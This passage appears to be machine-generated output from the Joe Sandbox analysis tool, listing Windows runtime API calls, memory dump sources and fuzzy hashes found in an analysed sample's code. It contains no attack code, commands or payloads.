                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,0033A4BC,?,20001004,00000000,00000002,?,?,003393CE), ref: 0033F250
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                • Opcode ID: 6f249779999e979c826d236cafa5533eceb06329f49185d6b0bf03cce8cc9371
                                                                                                                                                                                                                                                                • Instruction ID: c7657e932d988571d8330aa3c1e9822c86407789d580c335b87b32bf457eeca8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f249779999e979c826d236cafa5533eceb06329f49185d6b0bf03cce8cc9371
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DE04F7AD00218BFCF132F60DC45AAE7F19EF447A1F404420FD05A5171CB718D20AA95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00005135), ref: 00335019
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                • Opcode ID: a9d8c9ceb31d61c0607f9e215186abc5007fab037753905b915c274eeef4932f
                                                                                                                                                                                                                                                                • Instruction ID: 150720a30016ef703479e2e7bfb0d37c5782573375781bfe81794a2f3cbc10ab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9d8c9ceb31d61c0607f9e215186abc5007fab037753905b915c274eeef4932f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                                • Opcode ID: 262b81d131bc3190079973143a22a4738d8f4678bcc1be6b65ece8f44368756c
                                                                                                                                                                                                                                                                • Instruction ID: e130da7cdc2fc4920b0d2c97a900e207ca7514afa49bcec4198bdcbebd82fd03
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 262b81d131bc3190079973143a22a4738d8f4678bcc1be6b65ece8f44368756c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFA011B0A023008B83828F32AA0AB0C3BACAA023C2B088028A000C2030EB208880AF00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCPInfo.KERNEL32(011BFE78,011BFE78,00000000,7FFFFFFF,?,0034A20D,011BFE78,011BFE78,00000000,011BFE78,?,?,?,?,011BFE78,00000000), ref: 0034A2C8
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0034A383
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0034A412
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0034A45D
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0034A463
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0034A499
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0034A49F
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0034A4AF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 127012223-0
                                                                                                                                                                                                                                                                • Opcode ID: 9342bf08b6835833e686be986175fbbf2b5ca18138bd71bb84c40565ac07cdf3
                                                                                                                                                                                                                                                                • Instruction ID: 1b669aae874db035082a594098e0e14e9c944b3aebe5aa88a4c3b07b1216b2c9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9342bf08b6835833e686be986175fbbf2b5ca18138bd71bb84c40565ac07cdf3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC710972940A059BDF239F95CC86BAE7BFA9F45310F254055F904AF381E775EC008762
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0033550C
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00335538
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00335577
                                                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00335594
                                                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003355D3
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 003355F0
                                                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00335632
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00335655
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                • Opcode ID: 2d6090f4e35cc9bea644e97f7837cb1be01a259098b56b2021582b38d4e5d4bb
                                                                                                                                                                                                                                                                • Instruction ID: abfa828a17a3ed6c2dc31e98d8c080111afcd108d7bb9616df99bbcef8d84323
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d6090f4e35cc9bea644e97f7837cb1be01a259098b56b2021582b38d4e5d4bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1051A072600606AFEF229F65CC86FBB7BA9EF40751F564425FD05EA1A0DB30DD108B90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00336217
                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0033621F
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 003362A8
                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 003362D3
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00336328
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                • Opcode ID: 2b9f9002a7ea33bdb3bf2997852a297b11b48f8f6039071976e94ddaf8feb0a7
                                                                                                                                                                                                                                                                • Instruction ID: 492a90b17d630f87328ddbe71ff0b32f88068b793d3a1000196be56b45017db4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b9f9002a7ea33bdb3bf2997852a297b11b48f8f6039071976e94ddaf8feb0a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3418234A00218AFCF12DF68C8C6A9EBBB5EF45324F15C555E8149F3A2D771AA05CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,0033F578,0033186A,?,00000000,003331E1,0033186C,?,0033F1F6,00000022,FlsSetValue,0034DFE0,8,5,003331E1), ref: 0033F52A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                • Opcode ID: 066424019a4ae8340af20a1f66eaa4e13afafdfb11067ab9da81d44504a86887
                                                                                                                                                                                                                                                                • Instruction ID: e1b959f2cc2acb5b0f5f4b34274bd437abd872c1cfbe8009d5e8bbd4da27567b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 066424019a4ae8340af20a1f66eaa4e13afafdfb11067ab9da81d44504a86887
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1219372E02311AFDB239B65EC85A5B775C9B427A5F650130FD16AB2A0EB30FE00C6D0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 565d6e9cb7c00313a68079fd7211992ef4cffa9ded57647442df5de83b06e7b7
                                                                                                                                                                                                                                                                • Instruction ID: 53dd24b1b9f93867f9708bb4d28659b0ae23d703fc99c2689e0d0c38ff3bf35a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 565d6e9cb7c00313a68079fd7211992ef4cffa9ded57647442df5de83b06e7b7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7B11370A04344AFDF13DFA9D892BADBBF8AF46300F154199E5019F3A6C770A941CB62
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,0033D2B7,00335FB7,00335179), ref: 0033D2CE
                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0033D2DC
                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0033D2F5
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,0033D2B7,00335FB7,00335179), ref: 0033D347
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                • Opcode ID: e28ec3d1ea4337ece4867767ace7a3d3dcda7d6dccd51a40e47616f87b9f1a2c
                                                                                                                                                                                                                                                                • Instruction ID: 186b87cd0697e6b1b16b52b73caf29cc05af0c13c614d9aec36e534be79e2a01
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e28ec3d1ea4337ece4867767ace7a3d3dcda7d6dccd51a40e47616f87b9f1a2c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D01F23620F7259EE7272B74BCC596B2A9CEB017B6F240329F120A90F0EF15BC4492C1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 0033DCA7
                                                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 0033DF20
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                                • Opcode ID: 1dc41d27470410209cc3a0b2dbf2cbe885760f6c5b61698639a442d10c0721c1
                                                                                                                                                                                                                                                                • Instruction ID: a6e533bf1190751298d5eda33410eb8d3eca719147cf8e1f8006d7c6fd1b58f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dc41d27470410209cc3a0b2dbf2cbe885760f6c5b61698639a442d10c0721c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61B16971800209EFCF2ADFA4E8C19AEBBB5FF14310F15455AE811AF216D771EA61CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,825BC0CB,?,?,00000000,0034B774,000000FF,?,00338D16,00338BFD,?,00338DB2,00000000), ref: 00338C8A
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00338C9C
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,0034B774,000000FF,?,00338D16,00338BFD,?,00338DB2,00000000), ref: 00338CBE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                • Opcode ID: a2ebc0f2816eacbf2e43fb1f545e91f16c651129f6f63ac7fa625f05a2a249f4
                                                                                                                                                                                                                                                                • Instruction ID: 7f3b41f7e9c422655e46988e701db1a244716b9d93048e04aa8ef38f9b0fc4db
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2ebc0f2816eacbf2e43fb1f545e91f16c651129f6f63ac7fa625f05a2a249f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86016771945755EFDB138B54CC49FEEBBBCFB44B52F000525F811A22E0DB749900CA90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0033FCC2
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0033FD8B
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0033FDF2
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E531: RtlAllocateHeap.NTDLL(00000000,003331E1,0033186A,?,003360C1,0033186C,0033186A,?,?,?,00333181,003331E1,0033186E,0033186A,0033186A,0033186A), ref: 0033E563
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0033FE05
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0033FE12
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1423051803-0
